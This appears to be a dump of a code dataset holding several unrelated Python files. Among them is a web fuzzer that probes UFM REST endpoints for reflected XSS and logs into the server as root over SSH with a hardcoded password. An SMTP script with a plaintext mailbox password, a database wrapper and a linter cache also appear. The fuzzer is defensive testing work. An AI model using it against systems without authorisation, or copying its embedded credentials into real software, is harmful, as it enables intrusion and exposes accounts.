fid.write(file_header)\n fid.write('\\n'.join(replies))\n return filename\n","sub_path":"siklu_api.py","file_name":"siklu_api.py","file_ext":"py","file_size_in_byte":28777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"284711031","text":"import requests\nimport os\nimport argparse\nimport logging\nimport re\nimport 
paramiko\n\n# from non standard directory\nfrom beautifultable import BeautifulTable\n\n\nclass Fuzzer:\n #TODO - Complete all fuzzing files\n base = os.getcwd().split('src')[0] + 'fuzzing_files' + os.sep\n fuzzing_payload = {'alphbets': base + 'alphbets', 'http_methods': base + 'http_methods','integer_overflow': base + 'integer_overflow'}\n # each url is a list which has this structure of list:\n # list[0] = HTTP Method\n # list[1] = URL\n # list[2] = HTTP Method params (optional)\n # list[3] = HTTP Body (optional)\n urls = {\"UFM\": [[\"GET\",\"http://ip/ufmRest/monitoring/topx\", (('object', '@@Node@@'),('attr', 'TxBW'),),\"\"], \\\n [\"GET\",\"http://ip/ufmRest/app/users\",\"\",\"\"] ,\\\n [\"GET\",\"http://ip/ufmRest/monitoring/resources\",\"\",\"\"], \\\n\n ], 'mlnx_os': []}\n REST_LOG_FILE_PATH = '/opt/ufm/log/rest_api.log'\n\n def __init__(self, fuzzing_file , product , ip):\n self.fuzzing_file = fuzzing_file\n self.product = product\n self.ip = ip\n self.session = requests.session()\n self.results_headers = ['HTTP METHOD','URL','query params','body','status code', 'elapsed time (ms)', 'LOG ERROR','Reflected']\n self.table = BeautifulTable()\n self.table.column_headers = self.results_headers\n self.init_table()\n self.results = []\n self.result_file = os.getcwd() + 'results_file.txt'\n self.shell = None\n self.init_results_file()\n self.init_ssh()\n self.fuzzer_mamager()\n\n def init_ssh(self):\n logging.debug(\"start init_ssh \")\n ip = self.ip\n ssh = self.SSHConnect(ip , 'root', '3tango')\n self.shell = self.createshell(ssh)\n\n logging.debug(\"end init_ssh\")\n\n\n def clear_rest_api_log(self):\n logging.debug(\"start clear rest api log\")\n cmd = \"echo>\" + Fuzzer.REST_LOG_FILE_PATH\n expected = \"\"\n result , output = self.run_par_cmd(cmd= cmd, expect= expected, shell= self.shell)\n if not output:\n logging.error(\"rest api log was not cleared successfully\")\n else:\n logging.debug(\"rest api log was cleared.\")\n logging.debug(\"end clear rest api log\")\n\n def check_errors_in_rest_log(self):\n cmd = 'cat ' + Fuzzer.REST_LOG_FILE_PATH + '| ' + 'grep -i ERR|CRITICAL|FAILED'\n expected = ''\n result , out = self.run_par_cmd(cmd= cmd, expect= expected, shell= self.shell)\n # result should be '0' and 'out' should be empty in this case.\n if not out:\n logging.critical(\"Errors was found in REST API log \")\n logging.critical(\"log file content after running cmd (\" + str(cmd) + \"): \" + str(out))\n return True\n else:\n logging.debug(\"REST API log has not errors\")\n return False\n\n @staticmethod\n def get_ufm_headers():\n headers = {\n 'Pragma': 'no-cache',\n 'Accept-Encoding': 'gzip, deflate',\n 'Accept-Language': 'en-US,en;q=0.9,he;q=0.8,it;q=0.7,es;q=0.6',\n 'Authorization': 'Basic YWRtaW46MTIzNDU2',\n 'Content-Type': 'application/json',\n 'Accept': 'application/json, text/plain, */*',\n 'Cache-Control': 'no-cache',\n 'X-Requested-With': 'XMLHttpRequest',\n 'Connection': 'keep-alive',\n 'Referer': 'http://10.209.24.48/ufm_web/',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36',\n 'Expires': 'Sat, 01 Jan 2000 00:00:00 GMT',\n }\n\n return headers\n\n def load_fuzz_list(self):\n logging.info(\"Open selected fuzzing file..\")\n try:\n filename = Fuzzer.fuzzing_payload[self.fuzzing_file]\n logging.debug(\"Fuzzing file is \" + str(filename))\n with open(filename,'r') as f:\n return [line.strip() for line in f.readlines()]\n except Exception as e:\n logging.error(\"Exception : couldn't open 
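One caveat in `check_errors_in_rest_log` above: the remote shell parses `grep -i ERR|CRITICAL|FAILED` as a pipeline (grep for `ERR`, piped into a program named `CRITICAL`), not as an alternation, so the check does not match what was intended. A hedged fix is an extended-regex pattern in quotes:

```python
# Assumed fix: -E enables alternation and the single quotes keep the
# pattern out of the shell's pipeline parsing.
REST_LOG_FILE_PATH = '/opt/ufm/log/rest_api.log'
cmd = "grep -iE 'ERR|CRITICAL|FAILED' " + REST_LOG_FILE_PATH
print(cmd)
```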
fuzzing file\")\n exit(1)\n logging.debug(\"load_fuzz_list ended successfully\")\n \n def clear_results_for_next_url(self):\n logging.debug(\"Clearing results for next url\")\n self.results = []\n\n #clearing beautifulTable:\n for _ in range(len(self.table)):\n del self.table[0]\n\n @staticmethod\n def SSHConnect(ip, username, passowrd):\n ssh = paramiko.SSHClient()\n logging.debug(msg=\"Open SSH Client to :\" + str(ip))\n try:\n ssh.set_missing_host_key_policy(policy=paramiko.AutoAddPolicy())\n ssh.connect(ip, port=22, username=username, password=passowrd, allow_agent=False, look_for_keys=False)\n except Exception as ex:\n logging.error(msg=\"SSH Client wasn't established!\")\n sys.exit(0)\n logging.info(msg=\"Open SSH Client to :\" + str(ip) + \"established!\")\n return ssh\n\n @staticmethod\n def createshell(ssh):\n shell = ssh.invoke_shell()\n shell.settimeout(0.5)\n shell.recv(1024)\n # time.sleep(10)\n return shell\n\n @staticmethod\n def run_par_cmd(cmd, expect, shell):\n '''\n\n :param shell:\n :param cmd: cmd command like ' show version'\n :param expect: string to look for like '\n :return: 0 if the expected string was found in output.\n '''\n # sleeping for 3 seconds to the command will be executed after shell prompt is printed.\n shell.send(cmd + '\\n')\n out = ''\n while True:\n try:\n tmp = shell.recv(1024)\n if not tmp:\n break\n except Exception as e:\n break\n out += tmp.decode(\"utf-8\")\n ansi_escape = re.compile(r'\\x1B\\[[0-?]*[ -/]*[@-~]')\n out = ansi_escape.sub('', out)\n if expect not in out:\n return (1, out)\n return (0, out)\n\n\n def add_ip_to_url(self, url):\n url = str(url).replace('ip',self.ip)\n return url\n\n \n def fuzzer_mamager(self):\n\n #Load fuzzing option:\n fuzz_words = self.load_fuzz_list()\n product_urls = Fuzzer.urls[self.product]\n for url in product_urls:\n # Before we start to fuzz we want to make sure the basic URL ends with '200' OK.\n self.validate_url(url , fuzz_word = None)\n #if basic url doesn't work i want to skip fuzzing\n if str(self.results[0][4]) == '200':\n for word in fuzz_words:\n #TODO - delete\n word = ''\n self.validate_url(url, fuzz_word=word)\n self.print_results()\n self.save_results()\n self.clear_results_for_next_url()\n else:\n logging.critical(\"request for basic url failed, skipping url: \" + str(self.results[0][1]))\n\n\n\n #response = requests.get('http://10.209.24.48/ufmRest/app/users', headers=headers)\n\n \n def validate_current_url(self,http_method, url , params, body):\n logging.debug(\"start validating current url\")\n try:\n #check which http method is required:\n if http_method == 'GET':\n if params:\n logging.debug(\"request is GET with params:\")\n r = self.session.get(url,params=params, headers= self.get_ufm_headers())\n else:\n logging.debug(\"request is GET without params:\")\n r = self.session.get(url,headers=self.get_ufm_headers())\n elif http_method =='POST':\n if body:\n logging.debug(\"request is POST wih body:\")\n r = self.session.post(url, body, headers= self.get_ufm_headers())\n else:\n logging.error(\"request method couldn't be found in validate current url\")\n\n return r\n except Exception as e:\n logging.error(\"Exception received in validate current url\" + str(e))\n return None\n\n @staticmethod\n def cls():\n os.system('cls' if os.name == 'nt' else 'clear')\n\n def init_results_file(self):\n with open(self.fuzzing_file, 'w') as results_file:\n results_file.write('\\n')\n\n @staticmethod\n def convert_tuple_to_string(tup):\n tup_str = \"\"\n for t in tup:\n tup_str +='='.join(t)\n 
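Note that `SSHConnect` above calls `sys.exit(0)` in its except branch although the module never imports `sys`, so a failed connection raises `NameError` instead of exiting; adding `import sys` at the top (or re-raising the exception) avoids that. Separately, for one-shot commands paramiko's `exec_command` is usually simpler than polling an interactive shell the way `run_par_cmd` does; a hedged sketch (host and credentials are placeholders):

```python
import paramiko

def run_once(host, user, password, cmd):
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    ssh.connect(host, port=22, username=user, password=password,
                allow_agent=False, look_for_keys=False)
    try:
        # exec_command gives separate stdout/stderr and an exit status,
        # so no prompt or ANSI-escape scraping is needed.
        _, stdout, stderr = ssh.exec_command(cmd)
        return stdout.channel.recv_exit_status(), stdout.read().decode()
    finally:
        ssh.close()
```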
tup_str+=','\n tup_str = tup_str[:-1]\n return tup_str\n\n def save_results(self):\n logging.debug(\"starting save results\")\n logging.info(\"saving results of fuzzing file: \" + self.fuzzing_file)\n with open(self.fuzzing_file, 'a') as results_file:\n for row in self.results:\n for item in row:\n if isinstance(item, tuple):\n item = self.convert_tuple_to_string(item)\n results_file.write(str(item))\n results_file.write('.')\n results_file.write('\\n')\n logging.debug(\"end save results\")\n\n def print_results(self):\n #clear the screen before printing the results:\n self.cls()\n #save results into text file\n\n\n\n logging.debug(\"start print_result\")\n logging.info(\"printing all fuzzing results for url: \" + str(self.results[0][1]))\n for row in self.results:\n self.table.append_row(row)\n\n print(self.table)\n print(\"\\n\" *3)\n logging.debug(\"end print_result\")\n\n\n def parse_request_results(self,r, curent_url_type, current_params,current_body, fuzz_word):\n logging.debug(\"start parse request result\")\n try:\n result_list = []\n r_status_code = r.status_code\n r_elapsed_time = re.search('\\d*\\.{1}\\d*[0-4]', str(r.elapsed))[0]\n r_url = r.url\n r_url_type = curent_url_type\n except Exception as e:\n logging.error(\"Exception in parse_request_results\" + str(e) + \"exiting\")\n exit(1)\n\n if not current_params:\n current_params = 'N/A'\n if not current_body:\n current_body = 'N/A'\n\n #check if i received any errors in log file:\n error_in_log = self.check_errors_in_rest_log()\n if error_in_log == True:\n error_in_log = 'Yes'\n else:\n error_in_log = 'No'\n reflected = self.check_payload_reflected_in_html(r, fuzz_word)\n if reflected == True:\n reflected = 'Yes'\n else:\n reflected = 'No'\n\n result_list = [r_url_type,r_url,current_params,current_body,r_status_code,r_elapsed_time,error_in_log,reflected]\n\n\n logging.debug(\"adding result into result container\")\n self.results.append(result_list)\n logging.debug(\"end parse request result\")\n\n def check_payload_reflected_in_html(self, r, fuzz_word):\n logging.debug(\"start check payload reflected in html\")\n\n if fuzz_word is None:\n logging.debug(\"skip check of reflected XSS in base url\")\n return False\n\n if fuzz_word in r.content.decode('utf-8'):\n logging.critical(\"XSS reflected was found! 
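`parse_request_results` above regex-scrapes `str(r.elapsed)` to recover the elapsed time, but `requests` exposes `r.elapsed` as a `datetime.timedelta`, so the value can be read directly:

```python
import datetime

elapsed = datetime.timedelta(seconds=0.1234)  # stand-in for r.elapsed
# total_seconds() makes the regex over str(timedelta) unnecessary.
print(elapsed.total_seconds() * 1000.0)  # elapsed milliseconds
```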
fuzz_word = \" + str(fuzz_word) + \"URL = \" + str(r.url))\n return True\n else:\n logging.debug(\"XSS reflected wasn't found for URL = \" + str(r.url))\n return False\n logging.debug(\"end check payload reflected in html\")\n\n def init_table(self):\n self.table.max_table_width = 160\n for attr in self.results_headers:\n self.table.left_padding_widths[attr] = 1\n self.table.right_padding_widths[attr] = 1\n\n\n def validate_url(self, url ,fuzz_word):\n logging.debug(\"start validating basic url\")\n url_with_fuzz_sign = str(url[0]).replace(\"@@\",\"\")\n #check if url contains any parameters\n curent_url_type = url[0]\n current_url = self.add_ip_to_url(url[1])\n\n #checking if there is params for the request\n\n current_params = ''\n if url[2]:\n params = url[2]\n current_params = ()\n #params is tuple so i want to create new tuple without '@@' signs.\n first_tup_flag = True\n for tup in params:\n new_tup = ()\n if not fuzz_word:\n first, second =str(tup[0]).replace('@@',\"\") ,str(tup[1]).replace(\"@@\",'')\n else:\n first, second = str(re.sub(r'@@.*@@',fuzz_word,tup[0])),str(re.sub(r'@@.*@@',fuzz_word,tup[1]))\n\n new_tup = (first,second)\n if first_tup_flag:\n current_params = (first,second)\n first_tup_flag = False\n else:\n current_params = (current_params,new_tup)\n #check if there is body for the request\n current_body = \"\"\n if url[3]:\n if not fuzz_word:\n current_body = str(url[3]).replace(\"@@\",\"\")\n else:\n current_body = str(re.sub('@@.@@',fuzz_word,url[3]))\n #TODO - for debuggig\n #print(curent_url_type,current_url, current_params, current_body)\n logging.info(\"validate basic url before fuzzing: \" + current_url)\n r = self.validate_current_url(curent_url_type,current_url, current_params, current_body)\n self.parse_request_results(r, curent_url_type, current_params,current_body,fuzz_word)\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Fuzzing tool for web applications')\n parser.add_argument('--fuzzing_type',dest='fuzzing_type', choices=['alphbets', 'http_methods', 'integer_overflow','long'], help='choose fuzzing type')\n parser.add_argument('--project',choices=['UFM','UFMAPL','NEO','MFT','HPCX'] , dest='project', help='select a project from list')\n parser.add_argument('--ip', dest='ip',help='ip of your the machine you fuzz', required=True)\n parser.add_argument('--debug', dest='debug', action='store_true', help='change to debug mode')\n\n args = parser.parse_args()\n\n if args.debug:\n level = logging.DEBUG\n else:\n level = logging.INFO\n logging.basicConfig(filename='web_fuzzer.log',\n level=level,\n format='%(asctime)s %(levelname)-8s %(message)s',\n datefmt='%m-%d %H:%M',\n filemode='w')\n\n logging.info(\"Start Script...\")\n\n fuzz = Fuzzer(str(args.fuzzing_type).lower(), args.project, args.ip)\n\nif __name__ == '__main__':\n main()","sub_path":"web_fuzzer.py","file_name":"web_fuzzer.py","file_ext":"py","file_size_in_byte":14651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"61935048","text":"import os\n\nimport numpy as np\nimport pygame\n\n\nSHADOW_COLOR = (80, 80, 80)\n\n\nclass ImageHandler:\n def __init__(self):\n self.camera = np.zeros(2)\n self.scale = 100\n self.images = dict()\n self.load_images()\n self.debug_color = (255, 0, 255)\n self.font = pygame.font.Font(None, 30)\n\n def load_images(self):\n path = os.path.join('data', 'images')\n\n for r, d, f in os.walk(path):\n if 'bodies' in r:\n suffix = f'_{r.split(os.sep)[-1]}'\n else:\n suffix = ''\n\n for file in f:\n if 
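In `validate_url` above, the rebuilt query parameters are folded with `current_params = (current_params, new_tup)`, which nests the tuple one level deeper for every parameter after the second instead of producing the flat `(('k1', 'v1'), ('k2', 'v2'), ...)` shape that `requests` accepts. A hedged flat rewrite of just that loop:

```python
import re

def rebuild_params(params, fuzz_word=None):
    # params is a tuple of (key, value) pairs using @@...@@ placeholders.
    rebuilt = []
    for key, value in params:
        if fuzz_word is None:
            pair = (key.replace('@@', ''), value.replace('@@', ''))
        else:
            pair = (re.sub(r'@@.*@@', fuzz_word, key),
                    re.sub(r'@@.*@@', fuzz_word, value))
        rebuilt.append(pair)
    return tuple(rebuilt)

print(rebuild_params((('object', '@@Node@@'), ('attr', 'TxBW')), 'XSS'))
```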
'.png' in file:\n try:\n image = pygame.image.load(os.path.join(r, file))\n image = image.convert_alpha()\n name = file.replace('.png', '') + suffix\n self.images[name] = image\n\n image = image.copy()\n image.fill((0, 0, 0), special_flags=pygame.BLEND_MULT)\n image.fill(SHADOW_COLOR, special_flags=pygame.BLEND_MAX)\n self.images[f'shadow_{name}'] = image\n except pygame.error as message:\n raise SystemExit(message)\n\n self.image_to_tiles('wall', 3, 1)\n self.image_to_tiles('wall_vertical', 1, 3)\n self.image_to_tiles('platform', 3, 1)\n\n def image_to_tiles(self, name, nx, ny):\n image = self.images[name]\n width, height = image.get_size()\n tile_width = width // nx\n tile_height = height // ny\n\n for i in range(nx):\n for j in range(ny):\n rect = pygame.Rect(i * tile_width, j * tile_height, tile_width, tile_height)\n tile = image.subsurface(rect)\n self.images[f'{name}_{i}_{j}'] = image.subsurface(rect)\n\n tile = tile.copy()\n tile.fill((0, 0, 0), special_flags=pygame.BLEND_MULT)\n tile.fill(SHADOW_COLOR, special_flags=pygame.BLEND_MAX)\n self.images[f'shadow_{name}_{i}_{j}'] = tile\n","sub_path":"imagehandler.py","file_name":"imagehandler.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"96114809","text":"# Basic setup\nfrom email.mime.text import MIMEText\nimport smtplib\n\n# arg 1: message body; arg 2: subtype, 'plain' means plain text; arg 3: encoding\nmsg = MIMEText('hello,from Gt futures...','plain','utf-8')\n# printing shows that the body data is encoded\n# print(msg)\n# convert the data into string format\n# print(msg.as_string())\n\n# sender account and password, and the recipient account\nfrom_addr = '17635035787@163.com'\npwd = 'dxyna.'\nto_addr = 'se_cure@foxmail.com'\n# SMTP server address, i.e. the relaying server address -- the mail provider's server\nsmtp_server = 'smtp.163.com' # SMTP server address for NetEase 163\n\nserver = smtplib.SMTP(smtp_server,25) # default port without SSL is 25\n\nserver.set_debuglevel(1) # prints the exchange with the SMTP server\nserver.login(from_addr,pwd) # log in to the SMTP server\nserver.sendmail(from_addr,to_addr,msg.as_string()) # send: sender, recipient, body\nserver.quit() # close the connection\n\n# ==================== failed: 554 DT:SPM ===========================\n\n","sub_path":"WorksZhang/Gt_0717/smtp邮件/lx_邮件1.py","file_name":"lx_邮件1.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"503070459","text":"import psycopg2\nimport config\nimport sys\n\nclass dbConnection:\n \n def connect(self):\n try:\n self._connect = psycopg2.connect(\n database = self._database,\n host = self._host,\n user = self._user,\n password = self._password,\n sslmode = \"disable\")\n return True\n except:\n return False\n\n def __init__(self, params, log): \n self.log = log\n\n if not params:\n self.log.exception(\"No database found.\")\n raise Exception (\"No database found.\")\n\n self._database = params['database']\n self._host = params['host']\n self._user = params['user']\n self._password = params['password']\n\n self._connect = None\n\n if not self.connect():\n self.log.exception(\"Database connection error.\")\n raise Exception (\"Database connection error.\")\n\n\n def query(self, sql, values=None):\n\n # Open up cursor\n try:\n cur = self._connect.cursor()\n except:\n self.connect()\n cur = self._connect.cursor()\n\n q = r = f = None\n\n if values is not None:\n try:\n r = cur.execute(sql,values)\n except:\n self.log.exception(\"Unable to execute sql command, aborted!\")\n sys.exit(1)\n else:\n try:\n r = cur.execute(sql)\n except:\n self.log.exception(\"Unable to execute sql command, aborted!\")\n sys.exit(1)\n\n q = cur.query\n try:\n f = 
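The 163.com script above ends by noting a `554 DT:SPM` rejection; NetEase commonly spam-filters plaintext port-25 submissions that lack From/To/Subject headers. A hedged variant using implicit TLS on port 465 and explicit headers (account values are placeholders, not the original credentials):

```python
import smtplib
from email.mime.text import MIMEText

msg = MIMEText('hello, from Gt futures...', 'plain', 'utf-8')
# Many providers spam-filter messages that omit these headers.
msg['From'] = 'sender@example.com'
msg['To'] = 'recipient@example.com'
msg['Subject'] = 'test'

# SMTP_SSL speaks TLS from the first byte; 465 is the usual SSL port.
with smtplib.SMTP_SSL('smtp.163.com', 465) as server:
    server.login('sender@example.com', 'password')
    server.sendmail('sender@example.com', ['recipient@example.com'],
                    msg.as_string())
```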
cur.fetchone()\n except:\n f = None\n\n self.log.debug(\"Queried database with:\\n%s\" % q)\n \n self._connect.commit()\n self._connect.cursor().close()\n\n return f\n \n","sub_path":"reminders/dbconnection.py","file_name":"dbconnection.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"57323798","text":"\"\"\"This file defines a cache for linting results.\"\"\"\nimport os\n\nimport datetime\nimport hashlib\nimport pathlib\nimport sqlalchemy as sql\nimport typing\nfrom absl import flags\nfrom absl import logging\nfrom phd.lib.labm8 import shell\nfrom sqlalchemy import Binary\nfrom sqlalchemy import Column\nfrom sqlalchemy import DateTime\nfrom sqlalchemy import ForeignKey\nfrom sqlalchemy import Integer\nfrom sqlalchemy import String\nfrom sqlalchemy import UniqueConstraint\nfrom sqlalchemy import orm\nfrom sqlalchemy.dialects import mysql\nfrom sqlalchemy.ext import declarative\n\nfrom util.photolib import common\nfrom util.photolib import linters\n\n\nFLAGS = flags.FLAGS\n\nBase = declarative.declarative_base() # pylint: disable=invalid-name\n\n# Global state for the keywords cache database is initialized by\n# a call to InitializeErrorsCache().\nENGINE = None\nMAKE_SESSION = None\nSESSION = None\n\n\nclass Meta(Base):\n __tablename__ = \"meta\"\n\n key: str = Column(String(1024), primary_key=True)\n value: str = Column(String(1024))\n\n\nclass Directory(Base):\n \"\"\"Directory cache entry.\"\"\"\n __tablename__ = \"directories\"\n\n relpath_md5: str = Column(Binary(16), primary_key=True)\n checksum: bytes = Column(\n sql.Binary(16).with_variant(mysql.BINARY(16), 'mysql'), nullable=False)\n date_added: datetime.datetime = Column(\n DateTime, nullable=False, default=datetime.datetime.utcnow)\n\n def __repr__(self):\n return (f'{self.relpath}: '\n f'{shell.ShellEscapeCodes.YELLOW}{self.message}'\n f'{shell.ShellEscapeCodes.END} [{self.category}]')\n\n\nclass CachedError(Base):\n \"\"\"Cached linter error.\"\"\"\n __tablename__ = \"errors\"\n\n id: int = Column(Integer, primary_key=True)\n dir: str = Column(Binary(16), ForeignKey(\"directories.relpath_md5\"),\n nullable=False)\n relpath: str = Column(String(1024), nullable=False)\n category: str = Column(String(512), nullable=False)\n message: str = Column(String(512), nullable=False)\n fix_it: str = Column(String(512), nullable=False)\n\n directory: Directory = orm.relationship(\"Directory\")\n\n __table_args__ = (UniqueConstraint(\n 'dir', 'relpath', 'category', 'message', 'fix_it', name='unique_error'),)\n\n def __repr__(self):\n return (f'{self.relpath}: '\n f'{shell.ShellEscapeCodes.YELLOW}{self.message}'\n f'{shell.ShellEscapeCodes.END} [{self.category}]')\n\n\ndef InitializeErrorsCache(workspace_abspath: str) -> None:\n \"\"\"\n Initialize the keywords cache database.\n\n Args:\n workspace_abspath: The absolute path to the workspace root.\n \"\"\"\n global ENGINE\n global MAKE_SESSION\n global SESSION\n\n if ENGINE:\n raise ValueError(\"InitializeErrorsCache() already called.\")\n\n cache_dir = os.path.join(workspace_abspath, \".cache\")\n os.makedirs(cache_dir, exist_ok=True)\n path = os.path.join(cache_dir, \"errors.db\")\n uri = f\"sqlite:///{path}\"\n logging.debug(\"Errors cache %s\", uri)\n\n ENGINE = sql.create_engine(uri, encoding=\"utf-8\")\n Base.metadata.create_all(ENGINE)\n Base.metadata.bind = ENGINE\n MAKE_SESSION = orm.sessionmaker(bind=ENGINE)\n SESSION = MAKE_SESSION()\n RefreshLintersVersion()\n\n\ndef 
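`dbConnection.query` above hand-rolls cursor creation, a one-shot reconnect, and an unconditional commit. With psycopg2, the connection and cursor context managers are assumed to cover the commit/rollback and cleanup; a hedged compact variant for statements that return rows (DSN values are placeholders):

```python
import psycopg2

def query_one(dsn, sql, values=None):
    conn = psycopg2.connect(**dsn)
    try:
        # The connection context commits on success and rolls back on error;
        # the cursor context closes the cursor. Assumes a row-returning query.
        with conn:
            with conn.cursor() as cur:
                cur.execute(sql, values)
                return cur.fetchone()
    finally:
        conn.close()
```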
RefreshLintersVersion():\n \"\"\"Check that \"\"\"\n meta_key = \"linters.py md5\"\n\n cached_linters_version = SESSION.query(Meta) \\\n .filter(Meta.key == meta_key) \\\n .first()\n cached_checksum = (cached_linters_version.value\n if cached_linters_version else \"\")\n\n with open(linters.__file__) as f:\n actual_linters_version = Meta(\n key=meta_key, value=common.Md5String(f.read()).hexdigest())\n\n if cached_checksum != actual_linters_version.value:\n logging.debug(\"linters.py has changed, emptying cache ...\")\n SESSION.query(Directory).delete()\n SESSION.query(CachedError).delete()\n if cached_linters_version:\n SESSION.delete(cached_linters_version)\n SESSION.add(actual_linters_version)\n SESSION.commit()\n\n\nclass CacheLookupResult(object):\n \"\"\"Contains results of a cache lookup.\"\"\"\n\n def __init__(self, exists: bool, checksum: bytes, relpath: str,\n relpath_md5: str, errors: typing.List[CachedError]):\n self.exists = exists\n self.checksum = checksum\n self.relpath = relpath\n self.relpath_md5 = relpath_md5\n self.errors = errors\n\n\ndef AddLinterErrors(entry: CacheLookupResult,\n errors: typing.List[str]) -> None:\n \"\"\"Record linter errors in the cache.\"\"\"\n # Create a directory cache entry.\n directory = Directory(relpath_md5=entry.relpath_md5, checksum=entry.checksum)\n SESSION.add(directory)\n\n # Create entries for the errors.\n errors_ = [CachedError(\n dir=directory.relpath_md5,\n relpath=e.relpath,\n category=e.category,\n message=e.message,\n fix_it=e.fix_it or \"\"\n ) for e in errors]\n if errors_:\n SESSION.bulk_save_objects(errors_)\n SESSION.commit()\n logging.debug(\"cached directory %s\", entry.relpath)\n\n\ndef GetDirectoryMTime(abspath) -> int:\n \"\"\"Get the timestamp of the most recently modified file/dir in directory.\n\n Params:\n abspath: The absolute path to the directory.\n\n Returns:\n The seconds since epoch of the last modification. 
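`GetDirectoryMTime` above joins and stats every entry via `os.listdir` plus `os.path.getmtime`; a hedged single-pass variant uses `os.scandir`, whose `DirEntry.stat()` results avoid the separate path-building step:

```python
import os

def get_directory_mtime(abspath):
    # Latest modification time among direct children, 0 for an empty dir.
    with os.scandir(abspath) as entries:
        mtimes = [entry.stat().st_mtime for entry in entries]
    return int(max(mtimes)) if mtimes else 0
```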
If the directory is\n empty, zero is returned.\n \"\"\"\n paths = [os.path.join(abspath, filename) for filename in os.listdir(abspath)]\n if paths:\n return int(max(os.path.getmtime(path) for path in paths))\n else:\n return 0\n\n\ndef GetDirectoryChecksum(abspath: pathlib.Path) -> str:\n \"\"\"Compute a checksum to determine the contents and status of the directory.\n\n The checksum is computed\n\n Params:\n abspath:\n :return:\n \"\"\"\n hash = hashlib.md5()\n paths = [os.path.join(abspath, filename) for filename in os.listdir(abspath)]\n if paths:\n directory_mtime = int(max(os.path.getmtime(path) for path in paths))\n hash.update(str(directory_mtime).encode('utf-8'))\n for path in paths:\n if os.path.isfile(path):\n hash.update(str(path).encode('utf-8'))\n return hash\n\n\ndef GetLinterErrors(abspath: str, relpath: str) -> CacheLookupResult:\n \"\"\"Looks up the given directory and returns cached results (if any).\"\"\"\n relpath_md5 = common.Md5String(relpath).digest()\n\n # Get the time of the most-recently modified file in the directory.\n checksum = GetDirectoryChecksum(abspath).digest()\n\n ret = CacheLookupResult(\n exists=False,\n checksum=checksum,\n relpath=relpath,\n relpath_md5=relpath_md5,\n errors=[]\n )\n\n directory = SESSION \\\n .query(Directory) \\\n .filter(Directory.relpath_md5 == ret.relpath_md5) \\\n .first()\n\n if directory and directory.checksum == ret.checksum:\n ret.exists = True\n ret.errors = SESSION \\\n .query(CachedError) \\\n .filter(CachedError.dir == ret.relpath_md5)\n logging.debug(\"cache hit %s\", relpath)\n elif directory:\n logging.debug(\"removing stale directory cache %s\", relpath)\n\n # Delete all existing cache entries.\n SESSION.delete(directory)\n SESSION \\\n .query(CachedError) \\\n .filter(CachedError.dir == ret.relpath_md5) \\\n .delete()\n\n return ret\n","sub_path":"util/photolib/lintercache.py","file_name":"lintercache.py","file_ext":"py","file_size_in_byte":6979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"358932566","text":"#%% IMPORTATION oF THE NECESSARY LIBRARIES:\r\n\r\nimport numpy as np\r\nimport nibabel as nib\r\nimport importlib\r\n\r\nimport sys\r\nsys.path.append('../src')\r\nimport imageAnalysis as ia\r\nimport MachineLearningAlgorithms as ml\r\n#import matplotlib.pyplot as plt\r\n\r\n# Path of your repositery where you should put the training and the test \r\n# dataset\r\npath = \"./data/\"\r\n\r\nprint(\"\\nLibraries imported\")\r\n\r\n\r\n#%% RELOADING OF THE MODIFIED LIBRARIES:\r\n \r\nia = importlib.reload(ia)\r\nml = importlib.reload(ml)\r\n\r\nprint(\"\\nLibraries reloaded\")\r\n\r\n\r\n#%% LOADING OF THE FUNCTIONS USED IN THE SCRIPT:\r\n \r\ndef loadData( path, strDataset, strName, nSamples ):\r\n \"\"\" To load the 3D MRI images of a dataset\r\n \r\n INPUTS:\r\n path -- string, path of your repositery\r\n strDataset -- string, name of the dataset folder\r\n strName -- string, common name of each file \r\n nSamples -- integer, number of elements you want to pick up in the \r\n dataset folder \r\n OUTPUTS:\r\n datasetDic -- dictionary, the index of the dictionary corresponds to\r\n the file index of the 3D MRI images. And the value of the dictionary\r\n is a 3D np.array cropped such that we do not take into account the \r\n parts of the 3D images containing only zeros. 
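As its annotations hint, `GetDirectoryChecksum` above declares `-> str` but returns the `hashlib` object (callers then call `.digest()`), shadows the built-in `hash`, and its docstring trails off mid-sentence. A hedged cleaned-up version of the same idea:

```python
import hashlib
import os

def get_directory_checksum(abspath):
    """Digest of the directory's latest mtime plus its file paths."""
    md5 = hashlib.md5()
    paths = [os.path.join(abspath, name) for name in os.listdir(abspath)]
    if paths:
        latest = int(max(os.path.getmtime(p) for p in paths))
        md5.update(str(latest).encode('utf-8'))
        for path in paths:
            if os.path.isfile(path):
                md5.update(path.encode('utf-8'))
    return md5.digest()
```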
\r\n \"\"\"\r\n # Size of the image:\r\n xSize = 176\r\n ySize = 208\r\n zSize = 176\r\n\r\n # Limits of the regions of interest of the data:\r\n xLimMin = 14\r\n xLimMax = 18\r\n yLimMin = 12\r\n yLimMax = 15\r\n zLimMin = 3\r\n zLimMax = 20\r\n\r\n # Creation of the dictionary which will contain our dataset:\r\n datasetDic = {}\r\n\r\n for i in range(nSamples):\r\n # Complete path of the i-th file of the dataset:\r\n imageName = strName + str(i + 1)\r\n imagePath = path + \"/\" + strDataset + \"/\" + imageName + \".nii\"\r\n \r\n # Loading of the 3D images using a function from the nibabel library\r\n imageRaw = nib.load(imagePath)\r\n \r\n # Tranforming the images into data (3d np.array):\r\n datasetDic[i] = imageRaw.get_data()[xLimMin:xSize-xLimMax, \\\r\n yLimMin:ySize-yLimMax, zLimMin:zSize-zLimMax, 0]\r\n \r\n return datasetDic\r\n\r\n\r\ndef featuresExtraction(datasetDic, featureDic):\r\n \"\"\" To extract the relevant features from the input data\r\n \r\n INPUTS:\r\n datasetDic -- dictionary, it contains 